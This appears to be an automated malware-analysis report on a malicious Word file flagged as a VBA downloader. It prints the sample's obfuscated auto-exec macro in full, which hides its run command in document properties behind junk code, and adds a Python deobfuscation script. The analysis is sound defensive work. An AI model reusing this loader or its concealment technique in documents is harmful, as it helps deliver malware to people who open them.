Verdict: MALICIOUS (risk score 252)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious Word (OLE) document containing obfuscated VBA macros. The critical heuristic OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER fires on an auto-exec chain (autoopen -> MLHHwAkNz) that ends in CreateObject(zMZCKBr).Run$ <command>, 0. Neither the ProgID nor the command line is present in the macro source: both are concatenated at run time from ActiveDocument.CustomDocumentProperties lookups (through the ggTZpTK helper) and from the Comments built-in document property, while dead stores and never-called functions full of numeric arrays pad the module. The ClamAV signature Doc.Macro.VBSDownloader-6336817-0 points to downloader behaviour, but the command itself is not visible in this report. To recover it, dump the document's Comments field and its custom document properties from the original file (olemeta from oletools prints Comments; custom properties live in the user-defined section of the DocumentSummaryInformation stream) and reassemble the pieces in the order the macro concatenates them.
Heuristics (9)

- ClamAV: Doc.Macro.VBSDownloader-6336817-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings). Document contains VBA macro code.
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER). Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched lines in script:
  zVGmHgXkRK = xYXbnCdAkUb + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + RHruvHxgPu + yESXAmBay + UnAvKwHCPA + pNYBRFDg + DRLWdCBGGck + gBSFdSNYLE + HczKhZfVRr + MmWTfEcb + WHWTNBCE + bdLYPGCDZMv + xLzvpgnLTc
  CreateObject(zMZCKBr).Run$ zVGmHgXkRK + RHruvHxgPu + yESXAmBay + UnAvKwHCPA + pNYBRFDg + DRLWdCBGGck + gBSFdSNYLE + HczKhZfVRr + MmWTfEcb + WHWTNBCE + bdLYPGCDZMv + WaCAXDx, 0
  EkDrkgDpL = UzsppxthtX + NBVUtanZd = RetWYCCCtx
  In this sample the "decoder" is neither a char-array nor a hex decode: the ProgID handed to CreateObject (zMZCKBr) and the command line (zVGmHgXkRK) are built from ggTZpTK(...) lookups of ActiveDocument.CustomDocumentProperties and from the Comments built-in property, so neither string appears in the macro source. The names concatenated alongside them (RHruvHxgPu, yESXAmBay, ...) are never assigned anywhere in the previewed source; as undeclared variants they are Empty and add nothing to the string. The trailing ", 0" matches the hidden-window argument of WScript.Shell.Run, but the ProgID is only known once the custom properties have been dumped.
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: the same CreateObject(zMZCKBr).Run$ line quoted above.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched lines in script:
  Sub autoopen()
  MLHHwAkNz
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. The generic description does not fit this sample: a VBA project was recovered (macros.bas under Extracted artifacts), so this marker is the same autoopen entry point already reported above and adds no independent evidence.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace that Office writes into any document carrying drawing markup; it is not a network indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6833 bytes |

SHA-256: f04d6f11e02a34a51c83bd14890978d517470356102ae070f04f207c99ee2ceb
Detection (ClamAV): No threats found. This does not contradict the critical ClamAV hit above: the Doc.Macro signature fired on the submitted document, while the decoded source text extracted from it did not match.
Obfuscation or payload: likely. 111 of 141 identifiers look randomly generated (e.g. 'TawAcUNMGvK'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script; the listing is the sample's decoded VBA exactly as extracted):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Function rEhhNLmHXe()
VdvMbaYSfgN = 5228
Dim zFywaSZbYaw(5228)
PhytdTc = "aWCYSBta"
ZtFMDMDurS = "mTuEegR"
zFywaSZbYaw(4027) = bcmmEVNpW
zFywaSZbYaw(1427) = cxbSZvy
zFywaSZbYaw(752) = 7648 + 3803 + 1865 / 880 / 7565 - 1760 - 9608 + 7845 + 2391 + 7442
zFywaSZbYaw(4437) = 7023 + 8337 + 4924 + 7953 / 2402 - 5800 - 496 - 531 + 7216
zFywaSZbYaw(2393) = zxtDpVwH
zFywaSZbYaw(2140) = 3784
zFywaSZbYaw(4192) = AWFnVmYzffN
zFywaSZbYaw(3742) = PfyAUkHHF
zFywaSZbYaw(4576) = 5582 + 7490 + 7911 + 4508 / 1213 - 1054 - 368 + 3900 + 6177 + 6797
zFywaSZbYaw(4480) = 5086 + 7058 / 1308 - 1062 - 1664 - 1096 + 9391 + 5818
zFywaSZbYaw(1486) = 2976 + 7959 + 7698 + 3826 / 7721 - 7147 - 6058 + 9463 + 3787 + 6281
For VdvMbaYSfgN = 2164 To 2471
zFywaSZbYaw(VdvMbaYSfgN) = VdvMbaYSfgN
Next
YxvZmuYUb = zFywaSZbYaw(3941) + zFywaSZbYaw(2106) + zFywaSZbYaw(4800) + zFywaSZbYaw(4192) + zFywaSZbYaw(920) + zFywaSZbYaw(1412) + zFywaSZbYaw(801) + zFywaSZbYaw(5228)
End Function
Function BAbKYyk()
dAUpUPTzcR = 229
Dim ENTXWgeYES(229)
RRDxmbhCxDa = "nmAxtmtYWcH"
arpdSAkYFwT = "MfZfAsnkyp"
MPwvKWxXW = "sfLcZzXetpu"
ENTXWgeYES(208) = HuHBwBV
ENTXWgeYES(162) = UbezbdkCcdc
ENTXWgeYES(149) = hMXNvfdvAk
ENTXWgeYES(101) = 8532 + 2243 + 8318 + 3979 / 521 - 5931 - 769 - 2479 + 85 + 2116
ENTXWgeYES(142) = 1408 + 445 + 5128 + 8642 / 3822 / 5878 - 2766 - 9528 - 4291 + 9765 + 6324 + 9085
ENTXWgeYES(133) = YfcGAwS
ENTXWgeYES(156) = eYcCtMv
ENTXWgeYES(153) = zmrkdHW
ENTXWgeYES(120) = GsFRcwesmH
ENTXWgeYES(142) = 2583
ENTXWgeYES(185) = TawAcUNMGvK
ENTXWgeYES(87) = wFgpTnyGGE
ENTXWgeYES(122) = wKAxRLnV
ENTXWgeYES(177) = BxthBwe
ENTXWgeYES(215) = 4405 + 3631 / 7394 / 5284 - 7559 - 9674 - 5212 + 5457 + 4007
For dAUpUPTzcR = 111 To 98
ENTXWgeYES(dAUpUPTzcR) = dAUpUPTzcR
Next
yGbBFgUv = ENTXWgeYES(65) + ENTXWgeYES(207) + ENTXWgeYES(133) + ENTXWgeYES(126) + ENTXWgeYES(109) + ENTXWgeYES(114) + ENTXWgeYES(229)
End Function
Sub autoopen()
MLHHwAkNz
End Sub
Public Function ggTZpTK(aLuuSnwLsD)
EkDrkgDpL = UzsppxthtX + NBVUtanZd = RetWYCCCtx
sZfymRrpMhW = UBFmFtZvVbL + VxEykdHc = WGfXZkUyVH
LHvDMtZSg = YEnTbKYch + yYynXWMRRK = KTazuHU
bzeYnCzs = kxdVWeUvpVA + PpmVKScPBv = PMUkAUMxw
XBhrcbmyfHY = UefdmXRVPnX + eaTfYxv = uCSnxHdr
GnVAckkvP = ActiveDocument.CustomDocumentProperties(aLuuSnwLsD)
ggTZpTK = GnVAckkvP
EkDrkgDpL = UzsppxthtX + NBVUtanZd = RetWYCCCtx
sZfymRrpMhW = UBFmFtZvVbL + VxEykdHc = WGfXZkUyVH
LHvDMtZSg = YEnTbKYch + yYynXWMRRK = KTazuHU
bzeYnCzs = kxdVWeUvpVA + PpmVKScPBv = PMUkAUMxw
XBhrcbmyfHY = UefdmXRVPnX + eaTfYxv = uCSnxHdr
End Function
Public Function MLHHwAkNz()
EkDrkgDpL = UzsppxthtX + NBVUtanZd = RetWYCCCtx
sZfymRrpMhW = UBFmFtZvVbL + VxEykdHc = WGfXZkUyVH
LHvDMtZSg = YEnTbKYch + yYynXWMRRK = KTazuHU
bzeYnCzs = kxdVWeUvpVA + PpmVKScPBv = PMUkAUMxw
XBhrcbmyfHY = UefdmXRVPnX + eaTfYxv = uCSnxHdr
zMZCKBr = ggTZpTK("gESrSSRs") + ggTZpTK("LtyvZmea") + RHruvHxgPu + yESXAmBay + UnAvKwHCPA + pNYBRFDg + DRLWdCBGGck + gBSFdSNYLE + HczKhZfVRr + MmWTfEcb + WHWTNBCE + bdLYPGCDZMv + ggTZpTK("RZBMxFyx") + ggTZpTK("VtuHNxZE") + ggTZpTK("TySSvMWa")
EkDrkgDpL = UzsppxthtX + NBVUtanZd = RetWYCCCtx
sZfymRrpMhW = UBFmFtZvVbL + VxEykdHc = WGfXZkUyVH
LHvDMtZSg = YEnTbKYch + yYynXWMRRK = KTazuHU
bzeYnCzs = kxdVWeUvpVA + PpmVKScPBv = PMUkAUMxw
XBhrcbmyfHY = UefdmXRVPnX + eaTfYxv = uCSnxHdr
xYXbnCdAkUb = ggTZpTK("skvtMzn") + ggTZpTK("KKrUxLAC") + ggTZpTK("zLcsNBTVBDe") + ggTZpTK("cFXuHkv") + ggTZpTK("ETGSKAhy") + RHruvHxgPu + yESXAmBay + UnAvKwHCPA + pNYBRFDg + DRLWdCBGGck + gBSFdSNYLE + HczKhZfVRr + MmWTfEcb + WHWTNBCE + bdLYPGCDZMv + ggTZpTK("EXSECsGd")
zVGmHgXkRK = xYXbnCdAkUb + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + RHruvHxgPu + yESXAmBay + UnAvKwHCPA + pNYBRFDg + DRLWdCBGGck + gBSFdSNYLE + HczKhZfVRr + MmWTfEcb + WHWTNBCE + bdLYPGCDZMv + xLzvpgnLTc
CreateObject(zMZCKBr).Run$ zVGmHgXkRK + RHruvHxgPu + yESXAmBay + UnAvKwHCPA + pNYBRFDg + DRLWdCBGGck + gBSFdSNYLE + HczKhZfVRr + MmWTfEcb + WHWTNBCE + bdLYPGCDZMv + WaCAXDx, 0
EkDrkgDpL = UzsppxthtX + NBVUtanZd = RetWYCCCtx
sZfymRrpMhW = UBFmFtZvVbL + VxEykdHc = WGfXZkUyVH
LHvDMtZSg = YEnTbKYch + yYynXWMRRK = KTazuHU
bzeYnCzs = kxdVWeUvpVA + PpmVKScPBv = PMUkAUMxw
XBhrcbmyfHY = UefdmXRVPnX + eaTfYxv = uCSnxHdr
End Function
Function cuRdFPhNyy()
PAKbXHNs = 3556
Dim PxTBVuL(3556)
vpKEtPYnx = ("Agpwpszfg")
EZXWyEY = ("XzcpsXC")
PXTTnxLxu = ("HdfnbbUaT")
PxTBVuL(335) = zvrSEEWS
PxTBVuL(3269) = RaBpKdZPb
PxTBVuL(671) = 1627 + 5363 + 3169 / 1196 / 5182 - 3235 - 8697 - 4301 + 9446
PxTBVuL(3517) = 3855 + 9279 + 8098 + 9073 / 5136 / 1098 / 4134 - 1390 + 437
PxTBVuL(84) = 9851 + 1502 / 2521 / 7954 / 9675 - 5896 + 2676 + 2760 + 4792
PxTBVuL(988) = xfYTDBk
PxTBVuL(3036) = RnYXcAtaHyU
PxTBVuL(1971) = 5816
PxTBVuL(3496) = 736
PxTBVuL(1579) = 5903
PxTBVuL(900) = fUnDpVCg
PxTBVuL(619) = xYTtTZs
PxTBVuL(1396) = SHnLaxdmYK
PxTBVuL(746) = tudzsyWC
PxTBVuL(2580) = 6763 + 2705 / 127 / 3337 / 8002 - 1171 - 2151 - 3265 + 5714
PxTBVuL(934) = 6051 + 1672 + 8105 / 7566 / 2519 - 2021 - 69 + 9299 + 6548 + 1342
PxTBVuL(1897) = 5845 + 3909 / 8335 / 6919 - 318 - 3782 + 2200
PxTBVuL(2511) = 1510 + 2115 / 5185 - 2731 + 7613 + 4362 + 6558
gMDAUKSD = PxTBVuL(3065) + PxTBVuL(2753) + PxTBVuL(1831) + PxTBVuL(2344) + PxTBVuL(1254) + PxTBVuL(3556)
End Function
Function zSkudDrk()
MZFTydmPbn = 3388
Dim ByRErBgyY(3388)
kpkRVBWZAr = ("kpfpafWLbUZ")
nnPzVKwCX = ("zuppVFdcxW")
ByRErBgyY(2605) = euPyaVfXnbw
ByRErBgyY(2591) = tpKZUvbMF
ByRErBgyY(2467) = 9392 + 4172 + 2010 / 9155 - 434 + 8916 + 715 + 5617
ByRErBgyY(2912) = TWmucUPFT
ByRErBgyY(2370) = kYZyAVkrN
ByRErBgyY(1740) = sYpgVRZ
ByRErBgyY(130) = ZKfaSzhSFL
ByRErBgyY(3242) = 5817
ByRErBgyY(1984) = 3964
ByRErBgyY(2402) = 4316
ByRErBgyY(2329) = RWvkKgxyZcg
ByRErBgyY(750) = rPYFKMEtcS
ByRErBgyY(478) = bzAHXngf
ByRErBgyY(3195) = 1810 + 4173 + 5448 + 9085 / 9960 / 4120 / 1970 - 7155 + 4148 + 827 + 9461
ByRErBgyY(2534) = 9447 + 2277 / 2442 - 4398 - 3399 + 4688 + 4156
UfSyUNwcsTK = ByRErBgyY(1830) + ByRErBgyY(1978) + ByRErBgyY(782) + ByRErBgyY(191) + ByRErBgyY(1846) + ByRErBgyY(1149) + ByRErBgyY(3388)
GKktyztM = ByRErBgyY(1145) + ByRErBgyY(3152) + ByRErBgyY(2159) + ByRErBgyY(1981) + ByRErBgyY(3388)
EBdPfNk = ByRErBgyY(366) + ByRErBgyY(2102) + ByRErBgyY(203) + ByRErBgyY(1027) + ByRErBgyY(2676) + ByRErBgyY(2592) + ByRErBgyY(1554) + ByRErBgyY(3388)
End Function
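The loader heuristic above describes strings that are rebuilt at run time and fed to CreateObject, and the artifact note counts random-looking identifiers. The following Python script is an example added here; it is not part of the analyzer, of ClamAV or of oletools. It applies both ideas to a constructed excerpt of the previewed macro source: it scores identifier name-mangling, strips the dead stores and never-called functions that pad the module, and lists the document properties the surviving code reads, which is exactly what an analyst would dump next to recover the ProgID and the command line. The keyword list, the auto-exec entry names and the name-mangling thresholds (six or more characters, at least two case flips, vowel ratio at most 0.3) are the example's own assumptions, not values used by the analyzer.

```python
import re
from collections import Counter

# Constructed excerpt of the macro source previewed above (Module1): the auto-exec entry,
# the property-lookup helper, the execution sink and one junk function, identifiers as in the sample.
VBA_EXCERPT = """\
Sub autoopen()
MLHHwAkNz
End Sub
Public Function ggTZpTK(aLuuSnwLsD)
GnVAckkvP = ActiveDocument.CustomDocumentProperties(aLuuSnwLsD)
ggTZpTK = GnVAckkvP
End Function
Public Function MLHHwAkNz()
EkDrkgDpL = UzsppxthtX + NBVUtanZd = RetWYCCCtx
zMZCKBr = ggTZpTK("gESrSSRs") + ggTZpTK("LtyvZmea") + RHruvHxgPu + ggTZpTK("RZBMxFyx")
xYXbnCdAkUb = ggTZpTK("skvtMzn") + ggTZpTK("KKrUxLAC") + RHruvHxgPu
zVGmHgXkRK = xYXbnCdAkUb + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + RHruvHxgPu
CreateObject(zMZCKBr).Run$ zVGmHgXkRK + WaCAXDx, 0
End Function
Function zSkudDrk()
Dim ByRErBgyY(3388)
ByRErBgyY(2605) = euPyaVfXnbw
UfSyUNwcsTK = ByRErBgyY(1830) + ByRErBgyY(3388)
End Function
"""

# Assumed list of VBA keywords and Word/COM API names that must not count as user identifiers.
KEYWORDS = {"sub", "function", "end", "public", "private", "dim", "for", "to", "next", "set", "if",
            "then", "else", "call", "activedocument", "createobject", "run", "exec",
            "customdocumentproperties", "builtindocumentproperties"}
AUTOEXEC = {"autoopen", "auto_open", "document_open", "workbook_open", "autoexec"}
IDENT = re.compile(r"\b[A-Za-z_]\w*\b")
STRING = re.compile(r'"[^"]*"')
ASSIGN = re.compile(r"^\s*([A-Za-z_]\w*)(?:\([^)]*\))?\s*=")   # target of `x = ...` or `x(i) = ...`
DIM = re.compile(r"^\s*Dim\s+(\w+)")
PROC = re.compile(r"^\s*(?:Public |Private )?(?:Sub|Function)\s+(\w+)")

def identifiers(text):
    return {t for t in IDENT.findall(STRING.sub('""', text)) if t.lower() not in KEYWORDS}

def looks_random(name):
    """Name-mangling heuristic (thresholds assumed): repeated case flips and almost no vowels."""
    flips = sum(a.islower() != b.islower() for a, b in zip(name, name[1:]) if a.isalpha() and b.isalpha())
    vowels = sum(c in "aeiou" for c in name.lower())
    return len(name) >= 6 and flips >= 2 and vowels / len(name) <= 0.3

def random_identifier_ratio(src):
    names = identifiers(src)
    return sum(map(looks_random, names)) / len(names)

def procedures(lines):
    blocks, cur = [], None                                # (name, body_lines) per Sub/Function, in file order
    for line in lines:
        if m := PROC.match(line):
            cur = (m.group(1), [])
            blocks.append(cur)
        if cur is not None:
            cur[1].append(line)
        if re.match(r"^\s*End (?:Sub|Function)\b", line):
            cur = None
    return blocks

def strip_dead_code(src):
    """Drop never-read stores (to a fixpoint, so an array feeding only a dead store dies too), then unreachable procedures."""
    lines = [l for l in src.splitlines() if l.strip()]
    procs = {name for name, _ in procedures(lines)}
    changed = True
    while changed:
        changed, reads = False, Counter()
        for line in lines:
            body = STRING.sub('""', line)
            m = ASSIGN.match(body)
            if m and m.group(1) not in procs:             # a function-name target is its return value
                body = body[m.end():]                     # only the right-hand side is a read
            if not DIM.match(line):                       # a declaration reads nothing
                reads.update(IDENT.findall(body))
        kept = []
        for line in lines:
            m = DIM.match(line) or ASSIGN.match(STRING.sub('""', line))
            if m and m.group(1) not in procs and not reads[m.group(1)]:
                changed = True                            # dead store or unused array: junk
            else:
                kept.append(line)
        lines = kept
    blocks = procedures(lines)
    calls = {name: identifiers("\n".join(body)) & procs for name, body in blocks}
    live, todo = set(), [n for n in procs if n.lower() in AUTOEXEC]
    while todo:
        if (n := todo.pop()) not in live:
            live.add(n)
            todo.extend(calls.get(n, ()))
    return "\n".join(l for name, body in blocks if name in live for l in body)

def document_property_keys(src):
    """Property names the macro reads; literals passed to a helper wrapping CustomDocumentProperties count as custom names."""
    keys = {"builtin": set(re.findall(r'BuiltInDocumentProperties\("([^"]+)"\)', src)), "custom": set()}
    for name, body in procedures(src.splitlines()):
        if "CustomDocumentProperties(" in "\n".join(body):
            keys["custom"].update(re.findall(re.escape(name) + r'\("([^"]+)"\)', src))
    return keys
```

On the excerpt, random_identifier_ratio reports 17 of 18 names as mangled (only autoopen passes), strip_dead_code collapses the module to the 13-line autoopen -> MLHHwAkNz -> ggTZpTK chain that ends in the CreateObject sink, and document_property_keys returns Comments plus the five custom-property names. Names such as RHruvHxgPu survive the pass because they are read, but they are never assigned, so in VBA they are Empty and add nothing; the list of property names is what has to be read out of the document itself to rebuild the ProgID and the command line.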